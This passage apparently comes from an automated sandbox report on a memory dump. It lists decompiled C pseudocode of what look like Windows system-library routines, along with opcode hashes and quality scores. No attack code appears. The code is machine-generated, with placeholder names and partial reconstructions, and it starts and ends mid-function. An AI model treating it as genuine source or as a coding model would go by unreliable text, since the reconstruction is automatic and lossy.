                                                              					E010B165E(__ebx, 0x10d8ae4, (__edx -  *0x10d8b04 >> 0x14) + (__edx -  *0x10d8b04 >> 0x14), __edi, __ecx, (__edx -  *0x10d8b04 >> 0x14) + (__edx -  *0x10d8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                              				}
                                                              				E010AAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                              				if(E01007D50() == 0) {
                                                              					_t16 = 0x7ffe0388;
                                                              				} else {
                                                              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				if( *_t16 != 0) {
                                                              					_t16 = E0109FE3F(_t22, _t35, _v8, _v12);
                                                              				}
                                                              				return _t16;
                                                              			}












                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E0109FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				short _v58;
                                                              				char _v64;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_t24 = __ebx;
                                                              				_v12 =  *0x10dd360 ^ _t32;
                                                              				_t30 = __edx;
                                                              				_t31 = __ecx;
                                                              				E0102FA60( &_v64, 0, 0x30);
                                                              				_v24 = _a4;
                                                              				_v32 = _t31;
                                                              				_v28 = _t30;
                                                              				_v58 = 0x267;
                                                              				if(E01007D50() == 0) {
                                                              					_t18 = 0x7ffe0388;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v64);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E0109FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				short _v58;
                                                              				char _v64;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_t24 = __ebx;
                                                              				_v12 =  *0x10dd360 ^ _t32;
                                                              				_t30 = __edx;
                                                              				_t31 = __ecx;
                                                              				E0102FA60( &_v64, 0, 0x30);
                                                              				_v24 = _a4;
                                                              				_v32 = _t31;
                                                              				_v28 = _t30;
                                                              				_v58 = 0x266;
                                                              				if(E01007D50() == 0) {
                                                              					_t18 = 0x7ffe0388;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v64);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E010B8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				intOrPtr _v40;
                                                              				short _v66;
                                                              				char _v72;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v12 =  *0x10dd360 ^ _t32;
                                                              				_t31 = _a8;
                                                              				_t30 = _a12;
                                                              				_v66 = 0x1c20;
                                                              				_v40 = __ecx;
                                                              				_v36 = __edx;
                                                              				_v32 = _a4;
                                                              				_v28 = _a8;
                                                              				_v24 = _a12;
                                                              				if(E01007D50() == 0) {
                                                              					_t18 = 0x7ffe0386;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v72);
                                                              				_push(0x14);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f85cb65f7fb1171df674bfd8cd92ffc86a5094b71a21d34b34ead636cfa1fd1
                                                              • Instruction ID: 3813b057b2526b14c57cc288b9ab10974f06f83c3581470d134b05560658fba4
                                                              • Opcode Fuzzy Hash: 9f85cb65f7fb1171df674bfd8cd92ffc86a5094b71a21d34b34ead636cfa1fd1
                                                              • Instruction Fuzzy Hash: 40012C71A0121DAFDB00DFA9D9819EEBBB8EF58710F10405AF944E7391DA34A900CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E010B8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				short _v62;
                                                              				char _v68;
                                                              				signed char* _t29;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t41;
                                                              				intOrPtr _t42;
                                                              				signed int _t43;
                                                              
                                                              				_t40 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t43;
                                                              				_v28 = __ecx;
                                                              				_v62 = 0x1c2a;
                                                              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                              				_v24 = __edx;
                                                              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                              				if(E01007D50() == 0) {
                                                              					_t29 = 0x7ffe0386;
                                                              				} else {
                                                              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v68);
                                                              				_push(0x1c);
                                                              				_push(0x20402);
                                                              				_push( *_t29 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89316e4c11f67d46ebebe962dd541bfe57c46477bf2f8dfe92ef25a4000538e6
                                                              • Instruction ID: c40c292d34b26a92bf8f6b364e2459358bd9d08ed60498ec5dc9dcb6538784ad
                                                              • Opcode Fuzzy Hash: 89316e4c11f67d46ebebe962dd541bfe57c46477bf2f8dfe92ef25a4000538e6
                                                              • Instruction Fuzzy Hash: 8C11127090021A9FDB04DFA8D441BAEB7F4FF08300F0442A6E958EB381D6349940CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00FEDB60(signed int __ecx) {
                                                              				intOrPtr* _t9;
                                                              				void* _t12;
                                                              				void* _t13;
                                                              				intOrPtr _t14;
                                                              
                                                              				_t9 = __ecx;
                                                              				_t14 = 0;
                                                              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                              					_t13 = 0xc000000d;
                                                              				} else {
                                                              					_t14 = E00FEDB40();
                                                              					if(_t14 == 0) {
                                                              						_t13 = 0xc0000017;
                                                              					} else {
                                                              						_t13 = E00FEE7B0(__ecx, _t12, _t14, 0xfff);
                                                              						if(_t13 < 0) {
                                                              							L00FEE8B0(__ecx, _t14, 0xfff);
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                              							_t14 = 0;
                                                              						} else {
                                                              							_t13 = 0;
                                                              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                              						}
                                                              					}
                                                              				}
                                                              				 *_t9 = _t14;
                                                              				return _t13;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction ID: 3fa56ed1a676026e5725350dea56d1ebf626d82cb8bdb51708f909da3cbd437d
                                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction Fuzzy Hash: 59F0F6336016A29BD3326A5788C0F6BB6959FC1B60F270035F2059BB44DB648C02B6E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00FEB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                              				signed char* _t13;
                                                              				intOrPtr _t22;
                                                              				char _t23;
                                                              
                                                              				_t23 = __edx;
                                                              				_t22 = __ecx;
                                                              				if(E01007D50() != 0) {
                                                              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              				} else {
                                                              					_t13 = 0x7ffe0384;
                                                              				}
                                                              				if( *_t13 != 0) {
                                                              					_t13 =  *[fs:0x30];
                                                              					if((_t13[0x240] & 0x00000004) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					if(E01007D50() == 0) {
                                                              						_t13 = 0x7ffe0385;
                                                              					} else {
                                                              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              					}
                                                              					if(( *_t13 & 0x00000020) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					return E01067016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                              				} else {
                                                              					L3:
                                                              					return _t13;
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction ID: 1be52f6ce03d66908950e4889c62fda819dbaa2d8fdea1b274ea4fa53bd8a855
                                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction Fuzzy Hash: BB018632600580ABE723975EC844F5A7BD9EF51754F0940B1FA94CB6B1D779D810D215
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E0107FE87(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t35;
                                                              				_v16 = __ecx;
                                                              				_v54 = 0x1722;
                                                              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                              				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                              				if(E01007D50() == 0) {
                                                              					_t21 = 0x7ffe0382;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 06b148382c85410770f972d2ade3260bd228fdc91a13334e2cc69cfa4a87367a
                                                              • Instruction ID: 54760274d1fdb401afd81ba46593f002c42d8829621a6e1b52c7ad80654a5251
                                                              • Opcode Fuzzy Hash: 06b148382c85410770f972d2ade3260bd228fdc91a13334e2cc69cfa4a87367a
                                                              • Instruction Fuzzy Hash: 55016270A00219AFCB14DFA8D546AAEB7F4EF08704F1045A9E994DB382DA35E901CB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E010A131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				short _v50;
                                                              				char _v56;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t32;
                                                              				_v20 = _a4;
                                                              				_v12 = _a8;
                                                              				_v24 = __ecx;
                                                              				_v16 = __edx;
                                                              				_v50 = 0x1021;
                                                              				if(E01007D50() == 0) {
                                                              					_t18 = 0x7ffe0380;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              				}
                                                              				_push( &_v56);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7ac8ea6262447fb003824d8241636b6c7b686ba972da5cbf044c9ecea47faeed
                                                              • Instruction ID: bc1a7629eb0b2b29867d1faf255cf0ff8bf26b8fc6d81b964c842fa3ac1f8cb9
                                                              • Opcode Fuzzy Hash: 7ac8ea6262447fb003824d8241636b6c7b686ba972da5cbf044c9ecea47faeed
                                                              • Instruction Fuzzy Hash: 71011D71A01219AFCB14EFA9D545AAEB7F4EF18700F408059F995EB381E6349A00CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E010B8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				short _v50;
                                                              				char _v56;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t32;
                                                              				_v16 = __ecx;
                                                              				_v50 = 0x1c2c;
                                                              				_v24 = _a4;
                                                              				_v20 = _a8;
                                                              				_v12 = __edx;
                                                              				if(E01007D50() == 0) {
                                                              					_t18 = 0x7ffe0386;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v56);
                                                              				_push(0x10);
                                                              				_push(0x402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                              			}
















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6ea447d3c97c0990f60f51177d2a3184ff81096bf24dfb2995f0a46e9eb3440
                                                              • Instruction ID: 1441c420ec019d273d94a426e35c5d57b7d2bd03afcaa0fe4dad03ed997471f2
                                                              • Opcode Fuzzy Hash: e6ea447d3c97c0990f60f51177d2a3184ff81096bf24dfb2995f0a46e9eb3440
                                                              • Instruction Fuzzy Hash: B1014474A0121DAFDB10EFA8D545AAEB7F4EF18300F10805AF985EB390DA34DA00CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E010A1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				short _v46;
                                                              				char _v52;
                                                              				signed char* _t15;
                                                              				intOrPtr _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t28;
                                                              				signed int _t29;
                                                              
                                                              				_t26 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t29;
                                                              				_v12 = _a4;
                                                              				_v20 = __ecx;
                                                              				_v16 = __edx;
                                                              				_v46 = 0x1024;
                                                              				if(E01007D50() == 0) {
                                                              					_t15 = 0x7ffe0380;
                                                              				} else {
                                                              					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              				}
                                                              				_push( &_v52);
                                                              				_push(0xc);
                                                              				_push(0x20402);
                                                              				_push( *_t15 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                              			}















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b11ca568d5c914f2f14a0f1d043b7e5670a2a3e5354f0555cb8aaab8ba190545
                                                              • Instruction ID: 15d16489a84d3e1c8945ce06b3cfb78e9936cc9351021d3fe7d5c7633e741c3b
                                                              • Opcode Fuzzy Hash: b11ca568d5c914f2f14a0f1d043b7e5670a2a3e5354f0555cb8aaab8ba190545
                                                              • Instruction Fuzzy Hash: BDF06D71A01258EFDB14EFE8D505AAEBBF4EF18300F4440A9E995EB381EA34D900CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0100C577(void* __ecx, char _a4) {
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				void* _t17;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              
                                                              				_t18 = __ecx;
                                                              				_t21 = __ecx;
                                                              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0100C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xfc11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					__eflags = _a4;
                                                              					if(__eflags != 0) {
                                                              						L10:
                                                              						E010B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                              						L9:
                                                              						return 0;
                                                              					}
                                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              					if(__eflags == 0) {
                                                              						goto L10;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}










                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 664ba32db913d90f7e3ca48c2eab68f1d62d09857730038bcdea94968650c6c1
                                                              • Instruction ID: 934a5e6c76ad90f98ea0121cf32c6a456d8e580be7b82af95eb149803e83be42
                                                              • Opcode Fuzzy Hash: 664ba32db913d90f7e3ca48c2eab68f1d62d09857730038bcdea94968650c6c1
                                                              • Instruction Fuzzy Hash: E8F0F0BA8113908FF773831C8244B627FD89B05232F4486E7D586831C2D3A6CCC0C240
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 43%
                                                              			E010B8D34(intOrPtr __ecx, intOrPtr __edx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				short _v42;
                                                              				char _v48;
                                                              				signed char* _t12;
                                                              				intOrPtr _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t25;
                                                              				signed int _t26;
                                                              
                                                              				_t23 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t26;
                                                              				_v16 = __ecx;
                                                              				_v42 = 0x1c2b;
                                                              				_v12 = __edx;
                                                              				if(E01007D50() == 0) {
                                                              					_t12 = 0x7ffe0386;
                                                              				} else {
                                                              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v48);
                                                              				_push(8);
                                                              				_push(0x20402);
                                                              				_push( *_t12 & 0x000000ff);
                                                              				return E0102B640(E01029AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2e983db144cafb4fb72ae75c5c07aeca8bd682253a4cd96c04ef993ab996f45
                                                              • Instruction ID: 676deb98961a4b87ddf4b723d48212221fd23fac06b93a3431f47c0307cfa3f3
                                                              • Opcode Fuzzy Hash: e2e983db144cafb4fb72ae75c5c07aeca8bd682253a4cd96c04ef993ab996f45
                                                              • Instruction Fuzzy Hash: 83F05470A44619AFDB14EFB8D545AAE77B8EF18700F50809AE985EB291EA38D900C754
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E010A2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                              				void* __esi;
                                                              				signed char _t3;
                                                              				signed char _t7;
                                                              				void* _t19;
                                                              
                                                              				_t17 = __ecx;
                                                              				_t3 = E0109FD22(__ecx);
                                                              				_t19 =  *0x10d849c - _t3; // 0x12cf9390
                                                              				if(_t19 == 0) {
                                                              					__eflags = _t17 -  *0x10d8748; // 0x0
                                                              					if(__eflags <= 0) {
                                                              						E010A1C06();
                                                              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                              						__eflags = _t3;
                                                              						if(_t3 != 0) {
                                                              							L5:
                                                              							__eflags =  *0x10d8724 & 0x00000004;
                                                              							if(( *0x10d8724 & 0x00000004) == 0) {
                                                              								asm("int3");
                                                              								return _t3;
                                                              							}
                                                              						} else {
                                                              							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                              							__eflags = _t3 - 3;
                                                              							if(_t3 == 3) {
                                                              								goto L5;
                                                              							}
                                                              						}
                                                              					}
                                                              					return _t3;
                                                              				} else {
                                                              					_t7 =  *0x10d8724; // 0x0
                                                              					return E01098DF1(__ebx, 0xc0000374, 0x10d5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                              				}
                                                              			}








                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a38701e1a23fafb0fee4b0af929c83f4e4d3747eff489b933bad380271e38f49
                                                              • Instruction ID: 7241f948525987f1854d044cbff85fba13fd80abf92e2b1455ce5f2bc74055e0
                                                              • Opcode Fuzzy Hash: a38701e1a23fafb0fee4b0af929c83f4e4d3747eff489b933bad380271e38f49
                                                              • Instruction Fuzzy Hash: BBF0273A4131854ADF726BAC6111BE12FD2E756210F8A40D6ECD017206C5398883CF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E0102927A(void* __ecx) {
                                                              				signed int _t11;
                                                              				void* _t14;
                                                              
                                                              				_t11 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                              				if(_t11 != 0) {
                                                              					E0102FA60(_t11, 0, 0x98);
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                              					E010292C6(_t11, _t14);
                                                              				}
                                                              				return _t11;
                                                              			}






                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                              • Instruction ID: 24e2646da8534e7862ece35de85f89b9dd6aec089d68fa2ddf4097b40c41a530
                                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                              • Instruction Fuzzy Hash: B5E02B323405116BE7119E09CC80F4737ADDF92724F054079F5005E282C6E5DC0C87A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E0100746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                              				signed int _t8;
                                                              				void* _t10;
                                                              				short* _t17;
                                                              				void* _t19;
                                                              				intOrPtr _t20;
                                                              				void* _t21;
                                                              
                                                              				_t20 = __esi;
                                                              				_t19 = __edi;
                                                              				_t17 = __ebx;
                                                              				if( *((char*)(_t21 - 0x25)) != 0) {
                                                              					if(__ecx == 0) {
                                                              						E00FFEB70(__ecx, 0x10d79a0);
                                                              					} else {
                                                              						asm("lock xadd [ecx], eax");
                                                              						if((_t8 | 0xffffffff) == 0) {
                                                              							_push( *((intOrPtr*)(__ecx + 4)));
                                                              							E010295D0();
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                              						}
                                                              					}
                                                              					L10:
                                                              				}
                                                              				_t10 = _t19 + _t19;
                                                              				if(_t20 >= _t10) {
                                                              					if(_t19 != 0) {
                                                              						 *_t17 = 0;
                                                              						return 0;
                                                              					}
                                                              				}
                                                              				return _t10;
                                                              				goto L10;
                                                              			}










                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5109c6bd335c10d5dcd50cd2cc2e95236c02363eb8bdbc2adbbe619e5bd78d2c
                                                              • Instruction ID: 91dc36272f90182a37cb9643de35e6ce0229279c9f6603ece72dee60d53127d4
                                                              • Opcode Fuzzy Hash: 5109c6bd335c10d5dcd50cd2cc2e95236c02363eb8bdbc2adbbe619e5bd78d2c
                                                              • Instruction Fuzzy Hash: 2AF0B434508145AAEF479B6CC840BBDBFA1AF04254F0641A5D9D1AB1E1EB2CA800C785
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E010B8CD6(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				short _v38;
                                                              				char _v44;
                                                              				signed char* _t11;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t23;
                                                              				intOrPtr _t24;
                                                              				signed int _t25;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t25;
                                                              				_v12 = __ecx;
                                                              				_v38 = 0x1c2d;
                                                              				if(E01007D50() == 0) {
                                                              					_t11 = 0x7ffe0386;
                                                              				} else {
                                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v44);
